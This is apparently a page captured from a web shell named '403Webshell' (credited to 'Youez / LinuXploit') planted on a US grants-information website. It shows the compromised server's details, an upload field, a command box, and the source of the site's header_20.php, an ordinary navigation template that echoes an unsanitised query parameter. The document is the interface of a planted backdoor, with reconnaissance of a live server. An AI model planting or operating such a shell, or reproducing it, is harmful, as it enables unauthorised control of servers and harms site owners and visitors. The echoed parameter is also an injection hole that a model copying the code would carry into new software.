403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/usa_sites/usafundingapplications.ai/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/usa_sites/usafundingapplications.ai/header_20.php
<?
$tc = (! isset($_GET['tc'])) ? 'none': $_GET['tc'];
require_once("{$_SERVER["DOCUMENT_ROOT"]}/tracker/client/TrackerLib.php");

$tracker = new TrackerLib("usaga");

$params = $tracker->URLParameters();
$trackerparams = $tracker->TrackerParameters();
?>
<meta name="viewport" content="width=device-width" />
<style>
<!--
body	{margin:0px auto;background-color:#FFFFFF}
body table	{margin:0px auto}

.header	{font:bold 11pt/120% verdana}

.gray	{width:215px;background-color:#dbd7d6;text-align:center}
.white	{width:485px;background-color:#ffffff;text-align:left;font:9pt/120% verdana;padding-top:10px}

#base	{list-style-type:none;text-align:center;margin:0px auto}
#base li	{display:inline;padding:4px;font:7.5pt/120% verdana}
#base a:link, #base a:visited	{color:#000000;text-decoration:none}
#base a:hover, #base a:active	{color:#666666;text-decoration:underline}

#white	{color:#fff}

.red			{border-top:1px dotted #c1a0a0;border-left:1px dotted #c1a0a0}
.red td		{border-bottom:1px dotted #c1a0a0;border-right:1px dotted #c1a0a0}
.gold			{border-top:1px dotted #d7c59f;border-left:1px dotted #d7c59f}
.gold td		{border-bottom:1px dotted #d7c59f;border-right:1px dotted #d7c59f}
.green			{border-top:1px dotted #9caa71;border-left:1px dotted #9caa71}
.green td		{border-bottom:1px dotted #9caa71;border-right:1px dotted #9caa71}

.questions		{width:580px;color:#000066;margin-bottom:10px}
.questions input	{font: 9pt/120% verdana;display:inline;margin:1px 3px;color:#333333;background-color:#f8f8f8}
.questions select	{font: 9pt/120% verdana;margin:1px 3px;color:#333333;background-color:#f8f8f8}

.q		{background-color:#eeeeee;font:bold 9pt/120% verdana;}
.a		{font:normal 9pt/120% verdana;}

.gray img	{margin:5px}
.white p	{padding-left:10px}
.white img	{padding:0px 0px 5px 10px;border:0px}

table span	{font:bold 9pt/120% verdana;color:#000}

ol	{margin-left:40px}
-->
</style>
<link type="text/css" rel="stylesheet" href="style.css" />
<link href="responsive.css" type="text/css" rel="stylesheet">

</head>

<body>
	<table cellpadding="0" cellspacing="0" border="0" class="size" style="margin-bottom:20px; position:relative">
    	<tr>
        	<td colspan="2" id="logo" style="background:url(/images/logo.jpg) no-repeat;"></td>
        </tr>
        <tr>
        	<td class="gray" valign="top">
            	<img src="images/tpix.gif" width="209">
            </td>
        	<td class="white" valign="top">
            	<div id="navBar" class="click">
                	<style type="text/css">#navBar{position:absolute;top:54px;left:0;width:40px;height:26px;z-index:2;background-color:#888;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;transition:all 0.2s}#navBar:hover,#navBar:active,#navBar:focus{background-color:#ccc;cursor:pointer}#navBar hr{display:block;padding:0;margin:5px;width:30px;border:3px soild #fff;-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;}.unClick{left:219px!important;background-color:#f2f2f2!important}</style>
                    <script src="//ajax.googleapis.com/ajax/libs/jquery/1.8/jquery.min.js"></script>
                    <script type="text/javascript">
						$(document).ready(function(){
							$(window).bind("resize", function() {
								$('.white .nav').toggle($(this).width() >= 500);
								$('#navBar').removeClass('unClick');
							}).trigger("resize");
						});
						$(document).ready(function(){
							$('#navBar').toggle(
								function(){
									$('.white .nav').slideDown(200,'swing');
									$('#navBar').addClass('unClick');
								},
								function(){
									$('.white .nav').slideUp(200,'swing');
									setTimeout(function(){
										$('#navBar').removeClass('unClick');
								}, 200);
							});
						});
					</script>
                	<hr />
                	<hr />
                	<hr />
                </div>
	            <div class="nav">
	            	<ul>
	                	<li class="hnk" onMouseOut="this.className='hnk'" onMouseOver="this.className='hnk_'" onClick="window.location='index.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="index.php?tc=<?= $tc; ?><?= $params; ?>">Home Page</a>
	                	</li>
	                	<!--li class="hnk" onMouseOut="this.className='hnk'" onMouseOver="this.className='hnk_'" onClick="window.location='grants.php?tc=< ?= $tc; ?>< ?= $params; ?>'">
	                		<a href="grants.php?tc=< ?= $tc; ?>< ?= $params; ?>">Government Grants</a>
	                	</li-->
	                	<li class="lnk" onMouseOut="this.className='lnk'" onMouseOver="this.className='lnk_'" onClick="window.location='business_grants.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="business_grants.php?tc=<?= $tc; ?><?= $params; ?>">Business Grants</a>
	                	</li>
	                	<li class="slnk" onMouseOut="this.className='slnk'" onMouseOver="this.className='slnk_'" onClick="window.location='small_business_grants.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="small_business_grants.php?tc=<?= $tc; ?><?= $params; ?>">Small Business Funding</a>
	                	</li>
	                	<li class="slnk2" onMouseOut="this.className='slnk2'" onMouseOver="this.className='slnk2_'" onClick="window.location='start_up_&_home_business.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="start_up_&_home_business.php?tc=<?= $tc; ?><?= $params; ?>">Home & Start Up Business</a>
	                	</li>
	                	<li class="slnk2" onMouseOut="this.className='slnk2'" onMouseOver="this.className='slnk2_'" onClick="window.location='grants_for_women.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="grants_for_women.php?tc=<?= $tc; ?><?= $params; ?>">Women Owned Business</a>
	                	</li>
	                	<li class="slnk2" onMouseOut="this.className='slnk2'" onMouseOver="this.className='slnk2_'" onClick="window.location='minority_grants.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="minority_grants.php?tc=<?= $tc; ?><?= $params; ?>">Minority Owned Business</a>
	                	</li>
	                	<li class="lnk" onMouseOut="this.className='lnk'" onMouseOver="this.className='lnk_'" onClick="window.location='personal_grants.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="personal_grants.php?tc=<?= $tc; ?><?= $params; ?>">Personal Grants</a>
	                	</li>
	                	<li class="slnk" onMouseOut="this.className='slnk'" onMouseOver="this.className='slnk_'"  onClick="window.location='home_improvement_grants.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="home_improvement_grants.php?tc=<?= $tc; ?><?= $params; ?>">Home Repair</a>
	                	</li>
	                	<li class="slnk2" onMouseOut="this.className='slnk2'" onMouseOver="this.className='slnk2_'" onClick="window.location='debt_&_rent_assistance.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="debt_&_rent_assistance.php?tc=<?= $tc; ?><?= $params; ?>">Rent & Debt</a>
	                	</li>
	                	<li class="slnk2" onMouseOut="this.className='slnk2'" onMouseOver="this.className='slnk2_'" onClick="window.location='child_care_grants.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="child_care_grants.php?tc=<?= $tc; ?><?= $params; ?>">Child Care</a>
	                	</li>
	                	<li class="slnk2" onMouseOut="this.className='slnk2'" onMouseOver="this.className='slnk2_'" onClick="window.location='bills_assistance.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="bills_assistance.php?tc=<?= $tc; ?><?= $params; ?>">Bills Assistance</a>
	                	</li>
	                	<li class="lnk" onMouseOut="this.className='lnk'" onMouseOver="this.className='lnk_'" onClick="window.location='housing_grants.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="housing_grants.php?tc=<?= $tc; ?><?= $params; ?>">Housing Grants</a>
	                	</li>
	                	<li class="slnk" onMouseOut="this.className='slnk'" onMouseOver="this.className='slnk_'"  onClick="window.location='first_time_homebuyer_grants.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="first_time_homebuyer_grants.php?tc=<?= $tc; ?><?= $params; ?>">First Time Home Buyer</a>
	                	</li>
	                	<li class="slnk2" onMouseOut="this.className='slnk2'" onMouseOver="this.className='slnk2_'" onClick="window.location='rental_&_apartment_grants.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="rental_&_apartment_grants.php?tc=<?= $tc; ?><?= $params; ?>">Rental & Apartment Housing</a>
	                	</li>
	                	<li class="slnk2" onMouseOut="this.className='slnk2'" onMouseOver="this.className='slnk2_'" onClick="window.location='commercial_property_grants.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="commercial_property_grants.php?tc=<?= $tc; ?><?= $params; ?>">Commercial Property</a>
	                	</li>
	                	<li class="slnk2" onMouseOut="this.className='slnk2'" onMouseOver="this.className='slnk2_'" onClick="window.location='new_construction_&_development.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="new_construction_&_development.php?tc=<?= $tc; ?><?= $params; ?>">Construction & Development</a>
	                	</li>
	                	<li class="lnk" onMouseOut="this.className='lnk'" onMouseOver="this.className='lnk_'" onClick="window.location='education_grants.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="education_grants.php?tc=<?= $tc; ?><?= $params; ?>" class="wht">Education Grants</a>
	                	</li>
	                	<li class="slnk" onMouseOut="this.className='slnk'" onMouseOver="this.className='slnk_'"  onClick="window.location='pell_grants.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="pell_grants.php?tc=<?= $tc; ?><?= $params; ?>">Pell Grants</a>
	                	</li>
	                	<li class="slnk2" onMouseOut="this.className='slnk2'" onMouseOver="this.className='slnk2_'" onClick="window.location='college_scholarships.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="college_scholarships.php?tc=<?= $tc; ?><?= $params; ?>">Scholarships & Financial Aid</a>
	                	</li>
	                	<li class="slnk2" onMouseOut="this.className='slnk2'" onMouseOver="this.className='slnk2_'" onClick="window.location='research_&_training_grants.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="research_&_training_grants.php?tc=<?= $tc; ?><?= $params; ?>">Training & Research</a>
	                	</li>
	                	<li class="slnk2" onMouseOut="this.className='slnk2'" onMouseOver="this.className='slnk2_'" onClick="window.location='stafford_loans.php?tc=<?= $tc; ?><?= $params; ?>'">
	                		<a href="stafford_loans.php?tc=<?= $tc; ?><?= $params; ?>">Universities & Stafford Loans</a>
	                	</li>
	                </ul>
	            </div>

Youez - 2016 - github.com/yon3zu
LinuXploit